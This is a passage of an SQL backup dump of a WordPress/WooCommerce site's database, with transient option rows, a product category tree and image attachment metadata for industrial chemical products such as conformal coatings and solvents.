INSERT INTO `wp_options` VALUES (693239, '_transient_wc_products_will_display_516_1503410627', '1', 'no'); 
INSERT INTO `wp_options` VALUES (693240, '_transient_timeout_wc_products_will_display_86_1503410627', '1506005071', 'no'); 
INSERT INTO `wp_options` VALUES (693241, '_transient_wc_products_will_display_86_1503410627', '', 'no'); 
INSERT INTO `wp_options` VALUES (693242, '_transient_timeout_wc_products_will_display_99_1503410627', '1506005151', 'no'); 
INSERT INTO `wp_options` VALUES (693243, '_transient_wc_products_will_display_99_1503410627', '1', 'no'); 
INSERT INTO `wp_options` VALUES (693247, '_transient_timeout_wc_products_will_display_149_1503410627', '1506007950', 'no'); 
INSERT INTO `wp_options` VALUES (693248, '_transient_wc_products_will_display_149_1503410627', '', 'no'); 
INSERT INTO `wp_options` VALUES (693249, '_transient_timeout_wpseo-dashboard-totals', '1503498325', 'no'); 
INSERT INTO `wp_options` VALUES (693250, '_transient_wpseo-dashboard-totals', 'a:1:{i:2;a:2:{i:2;a:5:{s:8:"seo_rank";s:4:"good";s:5:"title";s:25:"Posts with good SEO score";s:5:"class";s:17:"wpseo-glance-good";s:10:"icon_class";s:4:"good";s:5:"count";s:2:"44";}i:3;a:5:{s:8:"seo_rank";s:2:"na";s:5:"title";s:27:"Posts without focus keyword";s:5:"class";s:15:"wpseo-glance-na";s:10:"icon_class";s:2:"na";s:5:"count";s:1:"5";}}}', 'no'); 
INSERT INTO `wp_options` VALUES (693252, '_transient_timeout_wc_products_will_display_145_1503410627', '1506004004', 'no'); 
INSERT INTO `wp_options` VALUES (693253, '_transient_wc_products_will_display_145_1503410627', '1', 'no'); 
INSERT INTO `wp_options` VALUES (693254, 'product_cat_children', 'a:22:{i:149;a:4:{i:0;i:9;i:1;i:150;i:2;i:151;i:3;i:325;}i:8;a:4:{i:0;i:16;i:1;i:20;i:2;i:21;i:3;i:529;}i:11;a:6:{i:0;i:27;i:1;i:28;i:2;i:29;i:3;i:30;i:4;i:31;i:5;i:511;}i:9;a:17:{i:0;i:34;i:1;i:35;i:2;i:36;i:3;i:37;i:4;i:38;i:5;i:39;i:6;i:40;i:7;i:143;i:8;i:156;i:9;i:165;i:10;i:168;i:11;i:515;i:12;i:516;i:13;i:517;i:14;i:518;i:15;i:519;i:16;i:520;}i:34;a:3:{i:0;i:45;i:1;i:46;i:2;i:171;}i:35;a:2:{i:0;i:79;i:1;i:86;}i:93;a:7:{i:0;i:95;i:1;i:127;i:2;i:128;i:3;i:129;i:4;i:155;i:5;i:227;i:6;i:228;}i:46;a:3:{i:0;i:96;i:1;i:97;i:2;i:98;}i:86;a:4:{i:0;i:99;i:1;i:100;i:2;i:101;i:3;i:160;}i:40;a:2:{i:0;i:115;i:1;i:116;}i:115;a:3:{i:0;i:122;i:1;i:123;i:2;i:124;}i:36;a:2:{i:0;i:130;i:1;i:131;}i:95;a:9:{i:0;i:137;i:1;i:138;i:2;i:142;i:3;i:144;i:4;i:145;i:5;i:152;i:6;i:159;i:7;i:161;i:8;i:174;}i:168;a:2:{i:0;i:169;i:1;i:170;}i:127;a:5:{i:0;i:175;i:1;i:176;i:2;i:177;i:3;i:178;i:4;i:179;}i:129;a:4:{i:0;i:180;i:1;i:181;i:2;i:229;i:3;i:230;}i:10;a:3:{i:0;i:231;i:1;i:232;i:2;i:339;}i:151;a:3:{i:0;i:260;i:1;i:261;i:2;i:262;}i:339;a:3:{i:0;i:340;i:1;i:341;i:2;i:343;}i:521;a:3:{i:0;i:522;i:1;i:523;i:2;i:524;}i:21;a:2:{i:0;i:525;i:1;i:526;}i:16;a:2:{i:0;i:527;i:1;i:528;}}', 'yes'); 
INSERT INTO `wp_options` VALUES (693255, '_transient_timeout_wc_products_will_display_160_1503410627', '1506005211', 'no'); 
INSERT INTO `wp_options` VALUES (693256, '_transient_wc_products_will_display_160_1503410627', '1', 'no'); 
INSERT INTO `wp_options` VALUES (693257, '_transient_timeout_wc_products_will_display_93_1503410627', '1506008272', 'no'); 
INSERT INTO `wp_options` VALUES (693258, '_transient_wc_products_will_display_93_1503410627', '', 'no'); 
INSERT INTO `wp_options` VALUES (693259, '_transient_timeout_wc_products_will_display_161_1503410627', '1506004158', 'no'); 
INSERT INTO `wp_options` VALUES (693260, '_transient_wc_products_will_display_161_1503410627', '1', 'no'); 
INSERT INTO `wp_options` VALUES (693261, '_transient_timeout_wc_products_will_display_150_1503410627', '1506004478', 'no'); 
INSERT INTO `wp_options` VALUES (693262, '_transient_wc_products_will_display_150_1503410627', '1', 'no'); 
INSERT INTO `wp_options` VALUES (693264, '_transient_timeout_wc_products_will_display_34_1503410627', '1506006967', 'no'); 
INSERT INTO `wp_options` VALUES (693265, '_transient_wc_products_will_display_34_1503410627', '', 'no'); 
INSERT INTO `wp_options` VALUES (693266, '_transient_timeout_wc_products_will_display_46_1503410627', '1506005928', 'no'); 
INSERT INTO `wp_options` VALUES (693267, '_transient_wc_products_will_display_46_1503410627', '', 'no'); 
INSERT INTO `wp_options` VALUES (693268, '_site_transient_timeout_n_nextend599c42985906a6.70397566', '1503416488', 'no'); 
INSERT INTO `wp_options` VALUES (693269, '_site_transient_n_nextend599c42985906a6.70397566', '1', 'no'); 
INSERT INTO `wp_options` VALUES (693270, '_site_transient_timeout_nextend599c42985906a6.70397566_google_r', '1503416488', 'no'); 
INSERT INTO `wp_options` VALUES (693271, '_site_transient_nextend599c42985906a6.70397566_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (693272, '_transient_timeout_wc_products_will_display_231_1503410627', '1506005057', 'no'); 
INSERT INTO `wp_options` VALUES (693273, '_transient_wc_products_will_display_231_1503410627', '1', 'no'); 
INSERT INTO `wp_options` VALUES (693274, '_transient_timeout_wc_products_will_display_101_1503410627', '1506005087', 'no'); 
INSERT INTO `wp_options` VALUES (693275, '_transient_wc_products_will_display_101_1503410627', '1', 'no'); 
INSERT INTO `wp_options` VALUES (693277, '_transient_timeout_wc_products_will_display_100_1503410627', '1506005256', 'no'); 
INSERT INTO `wp_options` VALUES (693278, '_transient_wc_products_will_display_100_1503410627', '1', 'no'); 
INSERT INTO `wp_options` VALUES (693280, '_transient_timeout_wc_products_will_display_171_1503410627', '1506005518', 'no'); 
INSERT INTO `wp_options` VALUES (693281, '_transient_wc_products_will_display_171_1503410627', '1', 'no'); 
INSERT INTO `wp_options` VALUES (693282, '_transient_timeout_wc_products_will_display_11_1503410627', '1506007255', 'no'); 
INSERT INTO `wp_options` VALUES (693283, '_transient_wc_products_will_display_11_1503410627', '', 'no'); 
INSERT INTO `wp_options` VALUES (693285, '_transient_timeout_wc_products_will_display_94_1503410627', '1506005871', 'no'); 
INSERT INTO `wp_options` VALUES (693286, '_transient_wc_products_will_display_94_1503410627', '1', 'no'); 
INSERT INTO `wp_options` VALUES (693287, '_transient_timeout_wc_products_will_display_95_1503410627', '1506008276', 'no'); 
INSERT INTO `wp_options` VALUES (693288, '_transient_wc_products_will_display_95_1503410627', '', 'no'); 
INSERT INTO `wp_options` VALUES (693289, '_transient_timeout_df72b0bd8894a3a3d3329602205004eb', '1503414191', 'no'); 
INSERT INTO `wp_options` VALUES (693290, '_transient_df72b0bd8894a3a3d3329602205004eb', '404', 'no'); 
INSERT INTO `wp_options` VALUES (693291, '_transient_timeout_wc_products_will_display_10_1503410627', '1506008339', 'no'); 
INSERT INTO `wp_options` VALUES (693292, '_transient_wc_products_will_display_10_1503410627', '', 'no'); 
INSERT INTO `wp_options` VALUES (693293, '_transient_timeout_wc_products_will_display_96_1503410627', '1506005937', 'no'); 
INSERT INTO `wp_options` VALUES (693294, '_transient_wc_products_will_display_96_1503410627', '1', 'no'); 
INSERT INTO `wp_options` VALUES (693295, '_transient_timeout_wc_products_will_display_232_1503410627', '1506008344', 'no'); 
INSERT INTO `wp_options` VALUES (693296, '_transient_wc_products_will_display_232_1503410627', '1', 'no'); 
INSERT INTO `wp_options` VALUES (693299, '_transient_timeout_wc_products_will_display_339_1503410627', '1506006796', 'no'); 
INSERT INTO `wp_options` VALUES (693300, '_transient_wc_products_will_display_339_1503410627', '', 'no'); 
INSERT INTO `wp_options` VALUES (693301, '_transient_timeout_wc_products_will_display_325_1503410627', '1506006967', 'no'); 
INSERT INTO `wp_options` VALUES (693302, '_transient_wc_products_will_display_325_1503410627', '1', 'no'); 
INSERT INTO `wp_options` VALUES (693303, '_transient_timeout_wc_products_will_display_262_1503410627', '1506006983', 'no'); 
INSERT INTO `wp_options` VALUES (693304, '_transient_wc_products_will_display_262_1503410627', '1', 'no'); 
INSERT INTO `wp_options` VALUES (693306, '_transient_timeout_wc_products_will_display_116_1503410627', '1506007198', 'no'); 
INSERT INTO `wp_options` VALUES (693307, '_transient_wc_products_will_display_116_1503410627', '1', 'no'); 
INSERT INTO `wp_options` VALUES (693308, '_transient_timeout_wc_products_will_display_37_1503410627', '1506007981', 'no'); 
INSERT INTO `wp_options` VALUES (693309, '_transient_wc_products_will_display_37_1503410627', '1', 'no'); 
INSERT INTO `wp_options` VALUES (693310, '_transient_timeout_wc_products_will_display_168_1503410627', '1506007430', 'no'); 
INSERT INTO `wp_options` VALUES (693311, '_transient_wc_products_will_display_168_1503410627', '', 'no'); 
INSERT INTO `wp_options` VALUES (693312, '_transient_timeout_wc_products_will_display_260_1503410627', '1506007436', 'no'); 
INSERT INTO `wp_options` VALUES (693313, '_transient_wc_products_will_display_260_1503410627', '1', 'no'); 
INSERT INTO `wp_options` VALUES (693314, '_transient_timeout_wc_products_will_display_174_1503410627', '1506007557', 'no'); 
INSERT INTO `wp_options` VALUES (693315, '_transient_wc_products_will_display_174_1503410627', '1', 'no'); 
INSERT INTO `wp_options` VALUES (693317, '_transient_timeout_45208f852fa8f9df2bb17f06210d7d81', '1503416174', 'no'); 
INSERT INTO `wp_options` VALUES (693318, '_transient_45208f852fa8f9df2bb17f06210d7d81', '404', 'no'); 
INSERT INTO `wp_options` VALUES (693319, '_wp_session_expires_70540229271e8d51497e0f0717e5696a', '1503419502', 'no'); 
INSERT INTO `wp_options` VALUES (693321, '_transient_timeout_wc_products_will_display_138_1503410627', '1506008302', 'no'); 
INSERT INTO `wp_options` VALUES (693322, '_transient_wc_products_will_display_138_1503410627', '1', 'no'); 
INSERT INTO `wp_options` VALUES (693323, '_transient_timeout_wc_products_will_display_518_1503410627', '1506008686', 'no'); 
INSERT INTO `wp_options` VALUES (693324, '_transient_wc_products_will_display_518_1503410627', '1', 'no');
#
# End of data contents of table `wp_options`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_postmeta`


#
# Delete any existing table `wp_postmeta`
#

DROP TABLE IF EXISTS `wp_postmeta`;


#
# Table structure of table `wp_postmeta`
#

CREATE TABLE `wp_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=45258 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_postmeta`
#
 
INSERT INTO `wp_postmeta` VALUES (1, 2, '_wp_page_template', 'default'); 
INSERT INTO `wp_postmeta` VALUES (2, 6, '_wp_attached_file', '2016/08/Conformal.jpg'); 
INSERT INTO `wp_postmeta` VALUES (3, 6, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:450;s:6:"height";i:318;s:4:"file";s:21:"2016/08/Conformal.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"Conformal-340x318.jpg";s:5:"width";i:340;s:6:"height";i:318;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"Conformal-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"Conformal-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"Conformal-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (4, 7, '_wp_attached_file', '2016/08/Conformal_Epoxy.jpg'); 
INSERT INTO `wp_postmeta` VALUES (5, 7, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4928;s:6:"height";i:3264;s:4:"file";s:27:"2016/08/Conformal_Epoxy.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:27:"Conformal_Epoxy-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:27:"Conformal_Epoxy-800x530.jpg";s:5:"width";i:800;s:6:"height";i:530;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"Conformal_Epoxy-768x509.jpg";s:5:"width";i:768;s:6:"height";i:509;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:29:"Conformal_Epoxy-1600x1060.jpg";s:5:"width";i:1600;s:6:"height";i:1060;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:27:"Conformal_Epoxy-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:27:"Conformal_Epoxy-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:27:"Conformal_Epoxy-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:27:"Conformal_Epoxy-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6, 8, '_wp_attached_file', '2016/08/CV-joints.jpg'); 
INSERT INTO `wp_postmeta` VALUES (7, 8, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5481;s:6:"height";i:3396;s:4:"file";s:21:"2016/08/CV-joints.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"CV-joints-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"CV-joints-800x496.jpg";s:5:"width";i:800;s:6:"height";i:496;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"CV-joints-768x476.jpg";s:5:"width";i:768;s:6:"height";i:476;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"CV-joints-1600x991.jpg";s:5:"width";i:1600;s:6:"height";i:991;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"CV-joints-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"CV-joints-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"CV-joints-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"CV-joints-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (8, 9, '_wp_attached_file', '2016/08/gasket.jpg'); 
INSERT INTO `wp_postmeta` VALUES (9, 9, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6016;s:6:"height";i:4016;s:4:"file";s:18:"2016/08/gasket.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"gasket-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"gasket-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"gasket-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"gasket-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"gasket-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"gasket-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"gasket-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"gasket-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (10, 10, '_wp_attached_file', '2016/08/MEdical-.jpg'); 
INSERT INTO `wp_postmeta` VALUES (11, 10, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:450;s:6:"height";i:320;s:4:"file";s:20:"2016/08/MEdical-.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"MEdical--340x320.jpg";s:5:"width";i:340;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"MEdical--250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"MEdical--200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"MEdical--225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12, 11, '_wp_attached_file', '2016/08/Sp.Solvents.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13, 11, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3500;s:6:"height";i:2333;s:4:"file";s:23:"2016/08/Sp.Solvents.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"Sp.Solvents-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:23:"Sp.Solvents-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"Sp.Solvents-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"Sp.Solvents-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"Sp.Solvents-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"Sp.Solvents-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"Sp.Solvents-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:23:"Sp.Solvents-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14, 12, '_wp_attached_file', '2016/08/Support.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15, 12, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:450;s:6:"height";i:387;s:4:"file";s:19:"2016/08/Support.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"Support-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"Support-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"Support-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"Support-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16, 13, '_wp_attached_file', '2016/08/VAZO-2-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17, 13, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5905;s:6:"height";i:5905;s:4:"file";s:20:"2016/08/VAZO-2-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"VAZO-2-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"VAZO-2-1-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"VAZO-2-1-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"VAZO-2-1-1600x1600.jpg";s:5:"width";i:1600;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"VAZO-2-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"VAZO-2-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"VAZO-2-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"VAZO-2-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18, 14, '_wp_attached_file', '2016/08/VAZO-3.jpg'); 
INSERT INTO `wp_postmeta` VALUES (19, 14, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3704;s:6:"height";i:3704;s:4:"file";s:18:"2016/08/VAZO-3.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"VAZO-3-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"VAZO-3-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"VAZO-3-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"VAZO-3-1600x1600.jpg";s:5:"width";i:1600;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"VAZO-3-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"VAZO-3-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"VAZO-3-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"VAZO-3-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (20, 15, '_wp_attached_file', '2016/08/Aerospace.jpg'); 
